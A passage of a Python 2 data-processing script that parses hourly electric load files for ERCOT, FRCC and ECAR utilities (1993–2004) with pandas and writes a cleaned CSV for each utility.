1993 : pd.read_csv('%s/ercot/1993/SRGT93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1994 : pd.read_fwf('%s/ercot/1994/SRGT94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/SRGT95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/SRGT96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/SRGT97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
17583 : {
1993 : pd.read_fwf('%s/ercot/1993/STEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['STEC'].loc[2:].astype(int)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['STEC'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[9].str.replace(',', '').astype(float)/1000).values
},
44372 : {
1993 : pd.read_fwf('%s/ercot/1993/TUEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/TUEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/TUEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/TUE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/TUE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TUEC'].loc[2:].astype(int)/1000).values
},
18715 : {
1993 : pd.read_csv('%s/ercot/1993/TMPP93' % (fulldir), skiprows=7, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/TMPP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/TMPP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['TMPP'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[10].str.replace(',', '').astype(float)/1000).values
},
18679 : {
1993 : pd.read_csv('%s/ercot/1993/TEXLA93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1995 : pd.read_fwf('%s/ercot/1995/TXLA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/TXLA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/TXLA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['TXLA'].loc[2:].astype(int)/1000).values
},
20404 : {
1993 : pd.read_fwf('%s/ercot/1993/WTU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('\s', '0')).astype(float).values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/WTU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/WTU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/WTU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['WTUC'].loc[2:].astype(int)/1000).values
}
}
ercot[2409][1998][ercot[2409][1998] > 300] = 0
ercot[2409][1999][ercot[2409][1999] > 300] = 0
if not os.path.exists('./ercot'):
os.mkdir('ercot')
for k in ercot.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(ercot[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ercot[k][i]))) for i in ercot[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./ercot/%s.csv' % k)
###### FRCC
# GAIN: 6909
# LAKE: 10623
# FMPA: 6567
# FPC: 6455
# FPL: 6452
# JEA: 9617
# KUA: 10376
# OUC: 14610
# TECO: 18454
# SECI: 21554
frcc = {
6909 : {
1993 : pd.read_fwf('%s/frcc/1993/GAIN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/frcc/1994/GAIN94' % (fulldir), header=None, sep=' ', skipinitialspace=True, skipfooter=2, skiprows=5).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/GAIN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/frcc/1996/GAIN96' % (fulldir), sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/GAIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/frcc/1998/GAIN98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3, header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/GAIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/GAIN00' % (fulldir), header=None).iloc[:, 4:].values.ravel(),
2002 : pd.read_excel('%s/frcc/2002/GAIN02' % (fulldir), sheetname=1, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
2003 : pd.read_excel('%s/frcc/2003/GAIN03' % (fulldir), sheetname=2, skiprows=3, header=None).iloc[:730, 8:20].values.ravel(),
2004 : pd.read_excel('%s/frcc/2004/GAIN04' % (fulldir), sheetname=0, header=None).iloc[:, 8:].values.ravel()
},
10623: {
1993 : pd.read_fwf('%s/frcc/1993/LAKE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/LAKE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/LAKE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/LAKE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/LAKE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/frcc/1998/LAKE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/LAKE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/LAKE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/frcc/2001/LAKE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/frcc/2002/LAKE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
6567 : {
1993 : pd.read_fwf('%s/frcc/1993/FMPA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/FMPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/FMPA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/FMPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/FMPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/frcc/1998/FMPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/FMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
2001 : pd.read_csv('%s/frcc/2001/FMPA01' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6).iloc[:, 2:-1].values.ravel(),
2002 : pd.read_csv('%s/frcc/2002/FMPA02' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
2003 : pd.read_csv('%s/frcc/2003/FMPA03' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/frcc/2004/FMPA04' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6, skipfooter=1).iloc[:, 1:].values.ravel()
},
6455 : {
1993 : pd.read_csv('%s/frcc/1993/FPC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1994 : pd.read_csv('%s/frcc/1994/FPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
1995 : pd.read_csv('%s/frcc/1995/FPC95' % (fulldir), engine='python', header=None)[0].values,
1996 : pd.read_excel('%s/frcc/1996/FPC96' % (fulldir), header=None, skiprows=2, skipfooter=1).iloc[:, 6:].values.ravel(),
1998 : pd.read_excel('%s/frcc/1998/FPC98' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
1999 : pd.read_excel('%s/frcc/1999/FPC99' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
2000 : pd.read_excel('%s/frcc/2000/FPC00' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
2001 : pd.read_excel('%s/frcc/2001/FPC01' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
2002 : pd.read_excel('%s/frcc/2002/FPC02' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
2004 : pd.read_excel('%s/frcc/2004/FPC04' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel()
},
6452 : {
1993 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1993/FPL93' % (fulldir), 'r').readlines()]).iloc[:365, :24].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1994 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1994/FPL94' % (fulldir), 'r').readlines()]).iloc[3:, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1995 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1995/FPL95' % (fulldir), 'r').readlines()[3:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1996 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1996/FPL96' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1997 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1997/FPL97' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1998 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1998/FPL98' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1999 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1999/FPL99' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2000 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2000/FPL00' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2001 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2001/FPL01' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2002 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2002/FPL02' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2003 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2003/FPL03' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2004 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2004/FPL04' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel()
},
9617 : {
1993 : pd.read_csv('%s/frcc/1993/JEA93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1994 : pd.read_csv('%s/frcc/1994/JEA94' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1996 : pd.read_fwf('%s/frcc/1996/JEA96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/JEA97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/frcc/1998/JEA98' % (fulldir), sep='\t', header=None)[2].values,
1999 : pd.read_csv('%s/frcc/1999/JEA99' % (fulldir), sep='\t', header=None)[2].values,
2000 : pd.read_excel('%s/frcc/2000/JEA00' % (fulldir), header=None)[2].values,
2001 : pd.read_excel('%s/frcc/2001/JEA01' % (fulldir), header=None, skiprows=2)[2].values,
2002 : pd.read_excel('%s/frcc/2002/JEA02' % (fulldir), header=None, skiprows=1)[2].values,
2003 : pd.read_excel('%s/frcc/2003/JEA03' % (fulldir), header=None, skiprows=1)[2].values,
2004 : pd.read_excel('%s/frcc/2004/JEA04' % (fulldir), header=None, skiprows=1)[2].values
},
10376 : {
1994 : pd.read_csv('%s/frcc/1994/KUA94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/frcc/1995/KUA95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/frcc/1997/KUA97' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
2001 : pd.read_csv('%s/frcc/2001/KUA01' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/frcc/2002/KUA02' % (fulldir), skipfooter=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel()
},
14610 : {
1993 : pd.read_fwf('%s/frcc/1993/OUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/OUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/OUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/OUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/OUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/frcc/1998/OUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/OUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/OUC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/frcc/2001/OUC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/frcc/2002/OUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
18454 : {
1993 : pd.read_fwf('%s/frcc/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/frcc/1998/TECO98' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
1999 : pd.read_csv('%s/frcc/1999/TECO99' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
2000 : pd.read_csv('%s/frcc/2000/TECO00' % (fulldir), engine='python', skiprows=3, header=None)[0].str[:4].astype(int).values,
2001 : pd.read_csv('%s/frcc/2001/TECO01' % (fulldir), skiprows=3, header=None)[0].values,
2002 : pd.read_csv('%s/frcc/2002/TECO02' % (fulldir), sep='\t').loc[:, 'HR1':].values.ravel(),
2003 : pd.read_csv('%s/frcc/2003/TECO03' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True).iloc[:, 2:].values.ravel()
},
21554 : {
1993 : pd.read_fwf('%s/frcc/1993/SECI93' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/SECI94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/SECI95' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/SECI96' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/SECI97' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/SECI99' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/SECI00' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
2002 : pd.read_fwf('%s/frcc/2002/SECI02' % (fulldir), header=None).iloc[:, 3:].values.ravel(),
2004 : pd.read_fwf('%s/frcc/2004/SECI04' % (fulldir), header=None).iloc[:, 3:].values.ravel()
}
}
frcc[6455][1995][frcc[6455][1995] > 10000] = 0
frcc[9617][2002][frcc[9617][2002] > 10000] = 0
frcc[10376][1995][frcc[10376][1995] > 300] = 0
if not os.path.exists('./frcc'):
os.mkdir('frcc')
for k in frcc.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(frcc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(frcc[k][i]))) for i in frcc[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./frcc/%s.csv' % k)
###### ECAR
# AEP: 829
# APS: 538
# AMPO: 40577
# BREC: 1692
# BPI: 7004
# CEI: 3755
# CGE: 3542
# CP: 4254
# DPL: 4922
# DECO: 5109
# DLCO: 5487
# EKPC: 5580
# HEC: 9267
# IPL: 9273
# KUC: 10171
# LGE: 11249
# NIPS: 13756
# OE: 13998
# OVEC: 14015
# PSI: 15470
# SIGE: 17633
# TE: 18997
# WVPA: 40211
# CINRGY: 3260 -> Now part of 3542
# FE: 32208
# MCCP:
ecar = {
829 : {
1993 : pd.read_fwf('%s/ecar/1993/AEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/AEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/AEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/AEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/AEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/AEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/AEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/AEP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/AEP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AEP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AEP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AEP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
538 : {
1993 : pd.read_fwf('%s/ecar/1993/APS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/APS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/APS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40577 : {
2001 : pd.read_fwf('%s/ecar/2001/AMPO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AMPO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AMPO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AMPO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
1692 : {
1993 : pd.read_fwf('%s/ecar/1993/BREC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/BREC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/BREC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/BREC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/BREC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/BREC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BREC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BREC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BREC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BREC02' % (fulldir), header=None)[1].values,
